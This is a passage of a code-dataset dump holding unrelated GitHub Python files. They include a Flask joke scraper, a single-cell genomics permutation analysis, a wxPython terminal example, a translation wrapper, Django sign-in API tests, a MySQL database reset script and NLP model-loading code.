1\n return res\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/api/v1/jokes\", methods=[\"GET\"])\ndef index():\n URL = \"http://bash.org.pl/latest/\"\n PARAMS = {\"page\": 1}\n computed_response_list_of_lists = []\n final_list = []\n for i in range(1, 6):\n PARAMS[\"page\"] = i\n computed_response_list_of_lists.append(json_from_html_using_bs4(URL, PARAMS))\n for sub_list in computed_response_list_of_lists:\n for item in sub_list:\n final_list.append(item)\n return final_list\n\n\napp.run(debug=False, host=\"0.0.0.0\")\n","repo_name":"mbrydak/overengineered-solutions","sub_path":"scraper_on_eks/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16935909436","text":"import os\nimport sys\n\nimport re\nimport time\nimport pandas as pd\nimport xarray as xr\nimport numpy as np\nfrom numpy import ones\nfrom numpy.linalg import cholesky\nfrom pandas_plink import read_plink1_bin\nfrom limix.qc import quantile_gaussianize\n\nfrom glimix_core.lmm import LMM\nfrom numpy import (\n asarray,\n# atleast_1d,\n# atleast_2d,\n concatenate,\n inf,\n# linspace,\n# ones,\n# sqrt,\n# stack,\n)\n# from numpy.linalg import cholesky\nfrom numpy_sugar import ddot\nfrom numpy_sugar.linalg import economic_qs_linear, economic_svd\n# from tqdm import tqdm\n\nfrom cellregmap._math import PMat, QSCov, ScoreStatistic\n\nfrom cellregmap import CellRegMap, run_interaction\n\narg = {}\n\n# gene index\narg[\"i\"] = int(sys.argv[1])\n\n# # SNP-gene index\narg[\"j\"] = int(sys.argv[2])\nseed = arg[\"j\"]\n\n\nrevision_folder = \"/hps/nobackup/stegle/users/acuomo/all_scripts/struct_LMM2/sc_endodiff/debug_May2021/REVISION/\"\n\n####### right away check if this was already run for this gene\n# filter file (columns: snp_id, gene)\nfvf_filename = revision_folder+\"/CRM_interaction_chr22/fvf.csv\"\nfvf = pd.read_csv(fvf_filename, index_col = 0)\n#print(fvf.head())\n\ngenes = fvf['feature'].unique()\n#print(genes)\n\ngene_name = genes[arg[\"i\"]]\ntrait_name = re.sub(\"_.*\",\"\",gene_name)\nprint(gene_name)\nprint(trait_name)\n\nfvf_gene = fvf[fvf['feature']==gene_name]\nn = 
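# The scraper above needs bash.org.pl to be reachable; the BeautifulSoup
# selectors themselves can be exercised offline against an inline fragment.
# The markup below is a hypothetical mimic of the structure those selectors
# imply, not a captured page:
from bs4 import BeautifulSoup

SAMPLE = '''
<div class="q post">
  <a class="qid click" href="/4863223/">#4863223</a>
  <div class="right">2021-01-01</div>
  <div class="quote post-content post-body">example joke body</div>
</div>
'''

soup = BeautifulSoup(SAMPLE, "html.parser")
joke = soup.find("div", class_="q post")
parsed = {
    "joke_id": joke.find("a", class_="qid click")["href"].replace("/", ""),
    "joke_date": joke.find("div", class_="right").text.strip(),
    "joke_content": joke.find("div", class_="quote post-content post-body").text.strip(),
}
print(parsed)  # {'joke_id': '4863223', 'joke_date': '2021-01-01', 'joke_content': 'example joke body'}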
fvf_gene.shape[0]\nprint(n)\n\nfolder = revision_folder+\"CRM_interaction_chr22/results_permG/\"\noutfilename = f\"{folder}{trait_name}_{seed}.tsv\"\nprint(outfilename)\n\nif os.path.exists(outfilename):\n print(\"File already exists, exiting\")\n sys.exit()\n\n\n# input files directory\ninput_files_dir = \"/hps/nobackup/stegle/users/acuomo/all_scripts/struct_LMM2/sc_endodiff/new/input_files/\"\n\n############################################\n########## Sample mapping file #############\n############################################\n\n## this file will map cells to donors \n## it will also only include donors we have single-cell data for (a subset of all of HipSci donors)\nsample_mapping_file = input_files_dir+\"sample_mapping_file.csv\"\nsample_mapping = pd.read_csv(sample_mapping_file, dtype={\"genotype_individual_id\": str, \"phenotype_sample_id\": str})\n\n## genotype_individual_id are donor IDs, as found in the genotype matrix (G) and GRM covariance (K)\n## phenotype_sample_id are cell IDs, as found in the scRNA-seq phenotype vector (y) and cell context covariance (C)\nsample_mapping.head()\n\n## extract unique individuals\ndonors = sample_mapping[\"genotype_individual_id\"].unique()\ndonors.sort()\nprint(\"Number of unique donors: {}\".format(len(donors)))\n\n############################################\n############# Kinship matrix ###############\n############################################\n\n## read in GRM (genotype relationship matrix; kinship matrix)\nkinship_folder=\"/hps/nobackup/hipsci/scratch/genotypes/imputed/2017-03-27/Full_Filtered_SNPs_Plink-F/\"\nkinship_file=kinship_folder+\"hipsci.wec.gtarray.HumanCoreExome.imputed_phased.20170327.genotypes.norm.renamed.kinship\"\nK = pd.read_csv(kinship_file, sep=\"\\t\", index_col=0)\nassert all(K.columns == K.index) #symmetric matrix, donors x donors\n\nK = xr.DataArray(K.values, dims=[\"sample_0\", \"sample_1\"], coords={\"sample_0\": K.columns, \"sample_1\": K.index})\nK = K.sortby(\"sample_0\").sortby(\"sample_1\")\ndonors = sorted(set(list(K.sample_0.values)).intersection(donors))\nprint(\"Number of donors after kinship intersection: {}\".format(len(donors)))\n\n## subset to relevant donors\nK = K.sel(sample_0=donors, sample_1=donors)\nassert all(K.sample_0 == donors)\nassert all(K.sample_1 == donors)\n\n## and decompose such as K = hK @ hK.T (using Cholesky decomposition)\nhK = cholesky(K.values)\nhK = xr.DataArray(hK, dims=[\"sample\", \"col\"], coords={\"sample\": K.sample_0.values})\nassert all(hK.sample.values == K.sample_0.values)\n\ndel K\nprint(\"Sample mapping number of rows BEFORE intersection: {}\".format(sample_mapping.shape[0]))\n## subsample sample mapping file to donors in the kinship matrix\nsample_mapping = sample_mapping[sample_mapping[\"genotype_individual_id\"].isin(donors)]\nprint(\"Sample mapping number of rows AFTER intersection: {}\".format(sample_mapping.shape[0]))\n\n############################################\n##### expand from donors to cells ##########\n\n## use sel from xarray to expand hK (using the sample mapping file)\nhK_expanded = hK.sel(sample=sample_mapping[\"genotype_individual_id\"].values)\nassert all(hK_expanded.sample.values == sample_mapping[\"genotype_individual_id\"].values)\n\n#####################################\n############ Genotypes ##############\n#####################################\n\n## read in genotype file (plink format)\nplink_folder = \"/hps/nobackup/hipsci/scratch/genotypes/imputed/2017-03-27/Full_Filtered_SNPs_Plink/\"\nplink_file = 
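# The kinship handling above relies on K = hK @ hK.T with hK the lower
# Cholesky factor (numpy.linalg.cholesky returns the lower triangle). A quick
# numerical check of that identity on a toy positive-definite matrix:
import numpy as np
from numpy.linalg import cholesky

K_toy = np.array([[1.0, 0.2, 0.1],
                  [0.2, 1.0, 0.3],
                  [0.1, 0.3, 1.0]])
hK_toy = cholesky(K_toy)
assert np.allclose(hK_toy @ hK_toy.T, K_toy)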
plink_folder+\"hipsci.wec.gtarray.HumanCoreExome.imputed_phased.20170327.genotypes.norm.renamed.bed\"\nG = read_plink1_bin(plink_file)\n\n\nj=seed\nfvf_sel = fvf_gene.iloc[j:(j+2)]\n\nleads = fvf_sel[fvf_sel['feature']==gene_name]['snpID'].unique()\nG_sel = G[:,G['snp'].isin(leads)]\n\n#### to permute G, create shuffled index\n# step 1 - shuffle G across donors (prior to expanding)\n# step 2 - expand normally\n# this is such as all cells from a given donor will keep the same genotype, but it will be that from another donor\n\nrandom = np.random.RandomState(int(seed))\nidx = random.permutation(G_sel.shape[0])\nIdx = xr.DataArray(idx, dims=[\"sample\"], coords = {\"sample\": G_sel.sample.values})\nidx_G = Idx.sel(sample=sample_mapping[\"genotype_individual_id\"].values)\n\n# expand out genotypes from cells to donors (and select relevant donors in the same step)\nG_expanded = G_sel.sel(sample=sample_mapping[\"genotype_individual_id\"].values)\nassert all(hK_expanded.sample.values == G_expanded.sample.values)\n\n#####################################\n############ Phenotypes #############\n#####################################\n\n# Phenotype (single-cell expression)\nphenotype_file = input_files_dir+\"phenotype.csv.pkl\"\nphenotype = pd.read_pickle(phenotype_file)\nprint(\"Phenotype shape BEFORE selection: {}\".format(phenotype.shape))\nphenotype = xr.DataArray(phenotype.values, dims=[\"trait\", \"cell\"], coords={\"trait\": phenotype.index.values, \"cell\": phenotype.columns.values})\nphenotype = phenotype.sel(cell=sample_mapping[\"phenotype_sample_id\"].values)\nprint(\"Phenotype shape AFTER selection: {}\".format(phenotype.shape))\nassert all(phenotype.cell.values == sample_mapping[\"phenotype_sample_id\"].values)\n\ny = phenotype.sel(trait=gene_name)\n# quantile normalise\ny = quantile_gaussianize(y)\n\n######################################\n########## Cell contexts #############\n######################################\n\n# cells by MOFA factors (20)\nC_file = \"/hps/nobackup/stegle/users/acuomo/all_scripts/struct_LMM2/sc_endodiff/debug_May2021/mofa_logcounts_model_factors.csv\"\nC = pd.read_csv(C_file, index_col = 0)\nC = xr.DataArray(C.values, dims=[\"cell\", \"pc\"], coords={\"cell\": C.index.values, \"pc\": C.columns.values})\nC = C.sel(cell=sample_mapping[\"phenotype_sample_id\"].values)\nassert all(C.cell.values == sample_mapping[\"phenotype_sample_id\"].values)\n\n# quantile normalise cell contexts\nC_gauss = quantile_gaussianize(C)\n\nn_cells = phenotype.shape[1]\nW = ones((n_cells, 1))\n\ny = y.values.reshape(y.shape[0],1)\nprint(y.shape)\n\n######################################\n############ Covariates ##############\n######################################\n\n# just an intercept in this case\nn_cells = phenotype.shape[1]\nW = ones((n_cells, 1))\n\n# unpack G\nGG = G_expanded.values\n\n# get decomposition of K*EEt \n# i.e. 
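# The permutation below is applied at donor level *before* expanding to cells,
# so every cell of a given donor still shares one genotype -- just that of a
# randomly chosen other donor. A toy illustration of the same idea with plain
# numpy/pandas (donor names here are invented for the example):
import numpy as np
import pandas as pd

donor_geno = pd.Series({"donorA": 0, "donorB": 1, "donorC": 2})             # one value per donor
cell_donor = pd.Series(["donorA", "donorA", "donorB", "donorC", "donorC"])  # donor of each cell

rng = np.random.RandomState(0)
shuffled = pd.Series(rng.permutation(donor_geno.values), index=donor_geno.index)
expanded = shuffled.loc[cell_donor].values  # cells of one donor stay identical
print(expanded)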
get Li's such that K*EEt = L1L1t + L2L2t + ..\n# [U, S, _] = economic_svd(C.values[:,0:20])\n[U, S, _] = economic_svd(C)\ndel _\nus = U * S\nLs = [ddot(us[:,i], hK_expanded) for i in range(us.shape[1])]\ndel us\n\nprint(\"Running for gene {}\".format(trait_name))\ncrm = CellRegMap(y=y, W=W, E=C_gauss.values[:,0:10], Ls=Ls)\n# run association test using CellRegMap\npvals = crm.scan_interaction(G=GG, idx_G = idx_G)[0]\n\npv = pd.DataFrame({\"chrom\":G_expanded.chrom.values,\n \"pv\":pvals,\n \"variant\":G_expanded.snp.values})\npv.head()\n\npv.to_csv(outfilename)\n","repo_name":"annacuomo/CellRegMap_analyses","sub_path":"endodiff/usage/scripts/interaction_test_2snps_per_gene_permuteG.py","file_name":"interaction_test_2snps_per_gene_permuteG.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9898162144","text":"import sys\nsys.path.insert(0, '..')\n\nimport wx\nimport wxterm\n\n\nclass Terminal(wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n term = wxterm.TerminalWindow(self, allow_bold=False)\n term.ForkCommand('bash', ['bash'])\n term.Bind(wxterm.EVT_TERM_CHILD_EXIT, self.OnExit)\n self.term = term\n\n s = wx.BoxSizer(wx.VERTICAL)\n s.Add(term, 1, wx.EXPAND, 0)\n self.SetSizer(s)\n\n def OnExit(self, event):\n self.GetParent().Close()\n\n\nif __name__ == '__main__':\n app = wx.App(0)\n f = wx.Frame(None, size=(800, 500))\n t = Terminal(f)\n font = wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL)\n t.term.SetFont(font)\n t.SetFocus()\n f.Show()\n app.MainLoop()\n","repo_name":"rpedroso/wxterm","sub_path":"examples/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"15328596869","text":"# -*- coding: utf8 -*-\nimport time\nimport logging\nfrom apiclient.discovery import build\n\n__author__ = \"imdreamrunner\"\n__email__ = \"imdreamrunner@gmail.com\"\n\n\nlog = logging.getLogger(__name__)\n\n\ndef translate_article(title, content, summary):\n retry = 0\n try:\n return _translate_article(title, content, summary)\n except Exception as ex:\n print(ex)\n retry += 1\n if retry > 3:\n raise ex\n log.info(\"Translation fails, retry in 3 seconds...\")\n time.sleep(3)\n\n\ndef _translate_article(title, content, summary):\n service = build('translate', 'v2', developerKey=\"\")\n result = service.translations().list(target='zh-CN', source='en', q=[title, content, summary]).execute()\n translated = result[\"translations\"][0][\"translatedText\"]\n return result[\"translations\"][0][\"translatedText\"], result[\"translations\"][1][\"translatedText\"], \\\n result[\"translations\"][2][\"translatedText\"]","repo_name":"imdreamrunner/reader","sub_path":"translate/_google.py","file_name":"_google.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8251588841","text":"from turtle import *\r\n\r\ndef interpret(pgm):\r\n t = Turtle()\r\n for instr in pgm:\r\n if instr == 'F':\r\n t.forward(10)\r\n elif instr == 'L':\r\n t.left(60)\r\n elif instr == 'R':\r\n t.right(120)\r\n else:\r\n print('Syntax error n \"{}\"'.format(instr))\r\n t.hideturtle()\r\n 
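# Note: as written, translate_article() above never actually retries. After the
# first failure it sleeps once, falls off the end of the function and
# implicitly returns None, and `retry > 3` is unreachable because there is no
# loop. A corrected wrapper, reusing that module's own _translate_article, log
# and time (a sketch of the fix, keeping the 3-attempt / 3-second policy):
def translate_article_fixed(title, content, summary, attempts=3, delay=3):
    for attempt in range(1, attempts + 1):
        try:
            return _translate_article(title, content, summary)
        except Exception as ex:
            if attempt == attempts:
                raise
            log.info("Translation failed (%s), retrying in %s seconds...", ex, delay)
            time.sleep(delay)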
exitonclick()\r\n\r\ninterpret('FLFRFLFRFLFRFLFRFLFRFLFR')\r\n","repo_name":"JungRyung/Python","sub_path":"examples/interpreter.py","file_name":"interpreter.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41256960885","text":"import os\nimport dill as pickle\nfrom train_ngram import train_ngram\nfrom train_crf_pos import train_crf_pos\nfrom train_morfessor import train_morfessor\nfrom eval import eval\nfrom pos_descriptions import *\nimport morfessor\nfrom stanza import Pipeline\n\n# Parameters\nlang = 'swedish'\ncorp_dir = os.path.join('data', 'corpora')\nmodel_dir = os.path.join('data', 'models')\n\n# Text corpora for training LMs\n# ENGLISH\n#lm_corpus_name = 'wikipedia2008_en.txt'\n# SWEDISH\n#lm_corpus_name = 'wikipedia_sv.txt' #source: https://linguatools.org/\n#lm_corpus_name = 'Yle_sv.pkl' #source: Kielipankki\n# FINNISH\nlm_corpus_name = 'Wikipedia_fi_2017.pkl' #source: Kielipankki\n\n# Text corpora for training POS LMs\n# ENGLISH\n#pos_lm_corpus_name = 'wikipedia2008_en_pos.txt'\n# SWEDISH\n#pos_lm_corpus_name = 'Yle_sv_pos.pkl'\n#pos_lm_corpus_name = 'wikipedia_sv_pos.txt'\n# FINNISH\npos_lm_corpus_name = 'Wikipedia_fi_2017_pos.pkl'\n\n# Text corpora for training Morfessor models\n# SWEDISH\n#morph_corpus = 'yle_sv_minicorpus.txt'\n#morph_corpus = 'Yle_sv.txt'\n# FINNISH\nmorph_corpus = 'Wikipedia_fi_2017.txt'\n\n# Text corpora consisting of word segments used for training morpheme LMs\n# FINNISH \nmorph_lm_corpus_name = 'Wikipedia_fi_2017_morph_segmented.pkl'\n\n# POS-tagged corpora for training POS taggers\n# ENGLISH\n#pos_corpus = nltk.corpus.treebank.tagged_sents()\n#pos_corpus_name = 'Penn_treebank'\n# SWEDISH\n#pos_corpus = 'UD_Swedish-Talbanken.pkl' #source: https://universaldependencies.org/\n#pos_corpus = 'Yle_sv_words_tags.pkl\n# FINNISH\npos_corpus = 'Wikipedia_fi_2017_words_tags.pkl'\n\n# Language Models\n# ENGLISH\n#lm_name = 'wikipedia2008_en_3gram.pkl'\n#lm_name = 'wikipedia2008_en_2gram.pkl'\n# SWEDISH\n#lm_name = 'wikipedia_sv_2gram.pkl'\n#lm_name = 'wikipedia_sv_3gram.pkl'\n#lm_name = 'Yle_sv_2gram.pkl'\n# FINNISH\n#lm_name = 'iltalehti_2gram.pkl'\nlm_name = 'Wikipedia_fi_2017_2gram.pkl'\n#lm_name = 'Wikipedia_fi_2017_3gram.pkl'\n\n# POS Language Models\n# ENGLISH\n#pos_lm_name = 'wikipedia2008_en_pos_3gram.pkl'\n# SWEDISH\n#pos_lm_name = 'wikipedia_sv_pos_3gram.pkl'\n#pos_lm_name = 'Yle_sv_pos_3gram.pkl'\n# FINNISH\npos_lm_name = 'Wikipedia_fi_2017_pos_3gram.pkl'\n\n# Morpheme Language Models\n# FINNISH\n#lm_segmented_name = 'Wikipedia_fi_2017_morph_segmented_3gram.pkl'\nlm_segmented_name = 'Wikipedia_fi_2017_morph_segmented_3gram_interpolated.pkl'\n\n# Morfessor models\n# SWEDISH\n#morph_model_name = 'yle_sv_minicorpus_morph'\n#morph_model_name = 'Yle_sv_morph'\n# FINNISH\nmorph_model_name = 'Wikipedia_fi_2017_morph'\n\n# POS Taggers\n# ENGLISH\n#pos_name = 'Penn_treebank_crf.pkl'\n# SWEDISH\n#pos_name = 'UD_Swedish-Talbanken_crf.pkl'\n#pos_name = 'Yle_sv_pos_crf.pkl'\n# FINNISH\npos_name = 'Wikipedia_fi_2017_words_tags_crf.pkl'\n\n# POS processors for extracting morphological features\n# SWEDISH\n#nlp = Pipeline(lang='sv', processors='tokenize,mwt,pos') #source: https://stanfordnlp.github.io/stanza/\n# FINNISH\nnlp = Pipeline(lang='fi', processors='tokenize,mwt,pos') #source: https://stanfordnlp.github.io/stanza/\n\nlm_type = 'ngram' # language model type\npos_lm_type = 'ngram' # POS language model type\nmorph_lm_type = 'ngram' # morpheme language model 
type\nn = 2 # ngram size for LM\nn_pos = 3 # ngram size for POS LM\nn_morph = 3 # ngram size for Morpheme LM\nsplit_prob = 0.5 # split probability for train_morfessor()\npos_type = 'crf' # POS model type\nthreshold = float('-inf') # lowest threshold for ngram log-probability\n # in text evaluation\n#text_to_analyze = \"This is a test text. The automatic assessor will report OOV words and uncommon ngrams.\"\n#text_to_analyze = 'Projektet DigiTala har som målsättning att analysera, utveckla och pröva möjligheter att testa muntlig färdighet med elektriska och datorbaserade medel. Oavsett regleringen i gymnasieskolans styrdokument att beakta samtliga kommunikativa delfärdigheter, saknas det muntliga testet fortfarande i den finländska studentexamen.'\ntext_to_analyze = 'DigiTala on poikkitieteellinen tutkimushanke, jonka tavoitteena on kehittää tietokoneavusteinen suullisen kielitaidon koe lukion päättövaiheeseen. '\nresult_file = 'testresult'\n\nTRAIN_LM = False # train new language model or load pretrained one\nTRAIN_POS_LM = False # train new POS language model or load pretrained one\nTRAIN_POS = False # train POS tagger or load pretrained one\nTRAIN_MORPH = False # Train Morfessor model or load pretrained one\nTRAIN_MORPH_LM = False # train new morpheme language model or load pretrained one\nSAVE_REPORT = False # save evaluation results\n\nif TRAIN_LM:\n if lm_type == 'ngram':\n lm = train_ngram(lm_corpus_name, n, words=True)\nelse:\n with open(os.path.join(model_dir, lm_name), 'rb') as f:\n lm = pickle.load(f)\n\nif TRAIN_POS_LM:\n if pos_lm_type == 'ngram':\n pos_lm = train_ngram(pos_lm_corpus_name, n_pos, words=False)\nelse:\n with open(os.path.join(model_dir, pos_lm_name), 'rb') as f:\n pos_lm = pickle.load(f) \n \nif TRAIN_POS:\n if pos_type == 'crf':\n if pos_corpus[-4:] == '.pkl':\n pos_corpus_name = pos_corpus[:-4]\n with open(os.path.join(corp_dir, pos_corpus), 'rb') as f:\n pos_corpus = pickle.load(f)\n pos_tagger = train_crf_pos(pos_corpus, pos_corpus_name)\nelse:\n with open(os.path.join(model_dir, pos_name), 'rb') as f:\n pos_tagger = pickle.load(f)\n \nif TRAIN_MORPH:\n morph_model = train_morfessor(morph_corpus, split_prob)\nelse:\n io = morfessor.MorfessorIO(compound_separator=r\"[^-\\w]+\" ,lowercase=True)\n morph_model = io.read_binary_model_file(os.path.join(model_dir, morph_model_name))\n\nif TRAIN_MORPH_LM:\n if morph_lm_type == 'ngram':\n lm_segmented = train_ngram(morph_lm_corpus_name, n_morph, words=True)\nelse:\n with open(os.path.join(model_dir, lm_segmented_name), 'rb') as f:\n lm_segmented = pickle.load(f) \n\n# Load the descriptions of POS tags\nif pos_name == 'Penn_treebank_crf.pkl':\n pos_descr_dict = pos_dict_en()\nelif pos_name == 'UD_Swedish-Talbanken_crf.pkl' or pos_name == 'Wikipedia_fi_2017_words_tags_crf.pkl':\n pos_descr_dict = pos_dict_sv()\nelif pos_name == 'Yle_sv_pos_crf.pkl':\n pos_descr_dict = pos_dict_sv_suc()\n\neval_result = eval(text_to_analyze, lm, pos_lm, pos_tagger, morph_model,\n lm_segmented, nlp, pos_descr_dict, threshold)\nif SAVE_REPORT:\n with open(os.path.join('results', result_file), 'w', encoding='utf-8') as f:\n f.write(eval_result)","repo_name":"Getmany1/NLP_ngram_assessor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70751750772","text":"class Solution:\n def commonChars(self, words: List[str]) -> List[str]:\n res=list(words[0])\n for word in words:\n newRes=[]\n for c in word:\n 
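# Each TRAIN_* branch above follows the same "train fresh or unpickle" shape;
# a small helper expresses that pattern once (a sketch only -- the script as
# committed spells the branches out individually):
import os
import dill as pickle

def load_or_train(train_flag, model_path, train_fn):
    if train_flag:
        return train_fn()
    with open(model_path, "rb") as f:
        return pickle.load(f)

# e.g. lm = load_or_train(TRAIN_LM, os.path.join(model_dir, lm_name),
#                         lambda: train_ngram(lm_corpus_name, n, words=True))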
if c in res:\n newRes+=c\n res.remove(c)\n res=newRes\n return res","repo_name":"HaojunYuan/MyLeetCode","sub_path":"1002-find-common-characters/1002-find-common-characters.py","file_name":"1002-find-common-characters.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70460115254","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom rest_framework.test import APIClient\nfrom rest_framework.test import APITestCase\nfrom django.contrib.auth.models import User\nfrom api.models import Event\nfrom rest_framework import status\nimport json\n\n\"\"\"\nTests all API calls for CRUD operations of the Event model.\nAll potential invalid and non-nullable fields are tested\n\"\"\"\n\n\nclass ManualUserSignInTest(TestCase):\n\n def setUp(self):\n self.client = APIClient()\n self.url = \"/api/manual_sign_in\"\n\n self.username = \"test1\"\n self.email = \"test@example.com\"\n self.password = \"mypassword\"\n self.user1 = User.objects.create_user(self.username, self.email, self.password)\n\n self.username2 = \"test2\"\n self.email2 = \"test2@example.com\"\n self.password2 = \"mypassword\"\n self.user2 = User.objects.create_user(self.username2, self.email2, self.password2)\n\n login_data = {\n 'username': 'test1',\n 'password': 'mypassword'\n }\n\n self.token_url = \"/api/api-token-auth/\"\n\n token_response = self.client.post(self.token_url, data=login_data, format='json')\n self.token = token_response.data.get('token')\n print(\"\\n\\ntoken\")\n print(self.token)\n\n self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)\n\n self.event = Event.objects.create(\n organiser=\"test1\",\n event_name=\"test\",\n location=\"test\",\n start_time='2050-01-29T12:00:00',\n finish_time='2050-01-29T12:30:00',\n sign_in_time='2050-01-29T12:00:00',\n attendees=['test2']\n )\n\n def test_manual_sign_in_success(self):\n\n data = {\n 'event_id': self.event.id,\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n print(\"\\n\\nattending\")\n print(self.event.attending)\n self.assertIsNotNone(response.data)\n\n def test_manual_sign_in_wrong_event_id(self):\n\n data = {\n 'event_id': 999999,\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('non_field_errors'))\n\n def test_manual_sign_in_wrong_user(self):\n\n data = {\n 'event_id': self.event.id,\n 'user': \"NOT\"\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('non_field_errors'))\n\n def test_manual_sign_in_already_signed_in(self):\n data = {\n 'event_id': self.event.id,\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIsNotNone(response.data)\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, 
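# The commonChars solution above is quadratic-ish because of the repeated
# `in res` scans and remove() calls. An equivalent, more idiomatic approach
# intersects collections.Counter objects, which also makes the per-character
# count semantics explicit (an illustrative alternative, not the submission):
from collections import Counter
from functools import reduce
from typing import List

def common_chars(words: List[str]) -> List[str]:
    counts = reduce(lambda a, b: a & b, map(Counter, words))  # & keeps per-char minimums
    return list(counts.elements())

# common_chars(["bella", "label", "roller"]) -> ['e', 'l', 'l']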
status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('non_field_errors'))\n\n def test_manual_sign_in_already_no_user(self):\n data = {\n 'event_id': self.event.id\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('user'))\n\n def test_manual_sign_in_already_no_event(self):\n data = {\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('event_id'))\n","repo_name":"Fanner487/fyp-django","sub_path":"fyp/api/tests/api/test_manual_user_sign_in_api.py","file_name":"test_manual_user_sign_in_api.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30563274672","text":"#!/usr/bin/python\n\nfrom helpers.logging_helper import *\nfrom helpers.mysql_helper import exec_mysql_query\nfrom helpers.config_helper import getConfig\n\n\ndef run():\n\tDB_USER = getConfig().get_db_user()\n\tDB_NAME = getConfig().get_db_name('squidlogs')\n\tDB_HOST = getConfig().get_db_host()\n\n\tquery = \"DROP DATABASE IF EXISTS \" + DB_NAME + \";\" + \\\n\t\t\t\"CREATE DATABASE \" + DB_NAME + \" DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;\" + \\\n\t\t\t\"GRANT ALL PRIVILEGES ON `\" + DB_NAME + \"` . * \" + \\\n\t\t\t\t\"TO '\" + DB_USER + \"'@'\" + DB_HOST + \"' WITH GRANT OPTION ;\" + \\\n\t\t\t\"GRANT ALL PRIVILEGES ON `\" + DB_NAME + \"` . * \" + \\\n\t\t\t\t\"TO '\" + DB_USER + \"'@'%' WITH GRANT OPTION ;\"\n\n\tlog_msg2(\"Limpiando B.D. 
squidlogs\")\n\n\tlog_msg3(\"Creando BD..\")\n\texec_mysql_query(DB_NAME, query=query)\n\tlog_msg_ok3()\n\n\tlog_msg3(\"Creando tablas..\")\n\texec_mysql_query(DB_NAME, sql_file='squidlogs_tables.sql')\n\tlog_msg_ok3()\n\n\tlog_msg_ok2()\n","repo_name":"rmajasol/WikipediaStatistics","sub_path":"clear_squidlogs.py","file_name":"clear_squidlogs.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"653336835","text":"\nimport linecache\nimport os\n\n# Convert data file to specified format\n\n# Tag category: BIO\nflag_list = [\"O\",\n \"B-DISE\", \"I-DISE\",\n \"B-PEST\", \"I-PEST\",\n \"B-PATH\", \"I-PATH\",\n \"B-DRUG\", \"I-DRUG\",\n \"B-PLAN\", \"I-PLAN\",\n \"B-WEED\", \"I-WEED\",\n\n \"B-CHEM\", \"I-CHEM\",\n \"B-BIOL\", \"I-BIOL\",\n \"B-TYPE\", \"I-TYPE\",\n \"B-AUXI\", \"I-AUXI\",\n \"B-PAST\", \"I-PAST\",\n \"B-BIST\", \"I-BIST\"\n ]\n\n\n\ndef getdata(the_file_path):\n data_list = []\n for line in open(the_file_path, \"r\"):\n line = line.replace(\"\\n\", \"\")\n data_list.append(line)\n str_begin = data_list[0].split(\"]--[\")\n str_end = data_list[1].split(\"]--[\")\n str_info = data_list[2].split(\"]--[\")\n str_type = data_list[3].split(\"]--[\")\n str_text = data_list[4]\n\n data_flag = []\n behind_flage = flag_list[0]\n for i in range(0,str_text.__len__()):\n char_text = str_text[i:i+1]\n end_type, flag_result = flag_judge(i, str_begin, str_end)\n num_inde = int(str_type[end_type])\n if(num_inde == 6):\n num_inde = 5\n if(num_inde >6):\n flag_result = 0\n if( flag_result == 1):\n if(behind_flage.__eq__(\"O\")):\n char_text = char_text + \" \" +flag_list[num_inde*2-1]\n if(str(i+1) in str_end):\n behind_flage = flag_list[0]\n else:\n behind_flage = flag_list[num_inde *2-1]\n else:\n char_text = char_text + \" \" + 